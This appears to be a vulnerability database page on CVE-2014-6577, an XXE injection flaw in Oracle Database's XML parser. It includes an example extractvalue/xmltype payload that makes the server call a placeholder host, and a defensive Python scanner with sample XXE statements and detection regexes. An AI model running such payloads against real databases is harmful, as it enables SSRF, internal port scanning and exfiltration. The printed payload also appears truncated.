CVE-2014-6577
Description
Unspecified vulnerability in the XML Developer's Kit for C component in Oracle Database Server 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors. NOTE: the previous information is from the January 2015 CPU. Oracle has not commented on the original researcher's claim that this is an XML external entity (XXE) vulnerability in the XML parser, which allows attackers to conduct internal port scanning, perform SSRF attacks, or cause a denial of service via a crafted (1) http: or (2) ftp: URI.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CVE-2014-6577: XXE injection in Oracle Database XML Parser allows authenticated users to perform SSRF, port scanning, or DoS.
Vulnerability
CVE-2014-6577 is an unspecified vulnerability in the XML Developer's Kit for C component of Oracle Database Server, which has been identified as an XML External Entity (XXE) injection issue in the XML parser module. Affected versions include 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2. The vulnerability can be triggered by calling the extractvalue() function for an xmltype object with a crafted http: or ftp: URI [1].
Exploitation
An attacker requires the CREATE SESSION privilege and network access to the database. By sending a specially crafted SQL query using extractvalue() and xmltype() with an XXE payload that references an external entity via HTTP or FTP, the vulnerable XML resolver will attempt to connect to the attacker-controlled URI. For example, a query like select extractvalue(xmltype('<!ENTITY xxe SYSTEM "https://IP/test">]><xxe;'),'/l') from dual; can trigger outbound connections from the database server [1].
Impact
Successful exploitation allows an authenticated remote attacker to affect confidentiality via unknown vectors (according to Oracle). The researcher's claim indicates that the XXE injection can be used for internal port scanning, Server-Side Request Forgery (SSRF) attacks, out-of-band data exfiltration, or denial-of-service (DoS). The FILE URI handler is converted to an XDB Repository path and fails, but HTTP and FTP URIs cause the server to attempt connections, enabling these attacks [1].
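As an added illustration (not code from the page, the researcher, or Oracle), the following Python check scans SQL statements taken from a database audit trail for external-entity declarations of the kind described in the Exploitation and Impact sections, rating http/ftp URIs as high because they cause outbound connections and file: as low because the page notes that resolution fails. The audit statements are constructed samples, and the XML function list is an assumption about which calls are worth inspecting.

```python
import re
from dataclasses import dataclass

# Matches <!ENTITY name SYSTEM "scheme:..."> (or PUBLIC "id" "uri") in any case.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<name>[\w.-]+)\s+(?:SYSTEM|PUBLIC\s+\"[^\"]*\")\s+"
    r"[\"'](?P<uri>[a-zA-Z][a-zA-Z0-9+.-]*:[^\"']*)[\"']",
    re.IGNORECASE,
)
# Assumed set of XML-parsing SQL functions whose string arguments reach the XDK parser.
XML_FUNC_RE = re.compile(
    r"\b(extractvalue|xmltype|xmlparse|existsnode|xmlquery)\s*\(", re.IGNORECASE
)


@dataclass
class Finding:
    line_no: int   # 1-based index of the statement in the input
    scheme: str    # URI scheme of the external entity, lower-cased
    uri: str
    severity: str  # "high" for http/https/ftp, "low" for file, "review" otherwise


def classify_scheme(scheme: str) -> str:
    # Per the page: HTTP and FTP URIs make the server connect out (SSRF, port
    # scanning, DoS); FILE URIs are mapped to an XDB Repository path and fail.
    s = scheme.lower()
    if s in ("http", "https", "ftp"):
        return "high"
    if s == "file":
        return "low"
    return "review"


def scan_sql(statements):
    """Return one Finding per external entity declared inside an XML function call."""
    findings = []
    for line_no, sql in enumerate(statements, 1):
        if not XML_FUNC_RE.search(sql):
            continue  # no XML parser involved; entity text elsewhere is not a parse
        for m in ENTITY_RE.finditer(sql):
            scheme = m.group("uri").split(":", 1)[0].lower()
            findings.append(Finding(line_no, scheme, m.group("uri"), classify_scheme(scheme)))
    return findings


# Constructed sample audit statements (not real captured data), in the form the page shows.
SAMPLE_AUDIT_SQL = [
    "select ename from emp where deptno = 10",
    "select extractvalue(xmltype('<a>1</a>'), '/a') from dual",
    "select extractvalue(xmltype('<!ENTITY xxe SYSTEM \"http://192.0.2.10:8080/test\">]><xxe;'),'/l') from dual",
    "SELECT EXTRACTVALUE(XMLTYPE('<!ENTITY xxe SYSTEM \"ftp://192.0.2.10/test\">]><xxe;'),'/l') FROM DUAL",
    "select extractvalue(xmltype('<!ENTITY xxe SYSTEM \"file:///tmp/test\">]><xxe;'),'/l') from dual",
]
```

Statements arriving through bind variables or PL/SQL wrappers will not show the entity text in SQL_TEXT, so this check complements, rather than replaces, applying the January 2015 CPU.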
Mitigation
Oracle released a fix as part of the January 2015 Critical Patch Update (CPU). The affected versions should be updated to the patched version corresponding to their release. No workarounds are provided; applying the CPU is the recommended mitigation. There is no indication that this CVE is listed in CISA's Known Exploited Vulnerabilities (KEV) catalog [1].
AI Insight generated on May 23, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:a:oracle:database_server:11.2.0.3:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:database_server:11.2.0.4:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:database_server:12.1.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:oracle:database_server:12.1.0.2:*:*:*:*:*:*:*
- Range: 11.2.0.3, 11.2.0.4, 12.1.0.1, 12.1.0.2
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.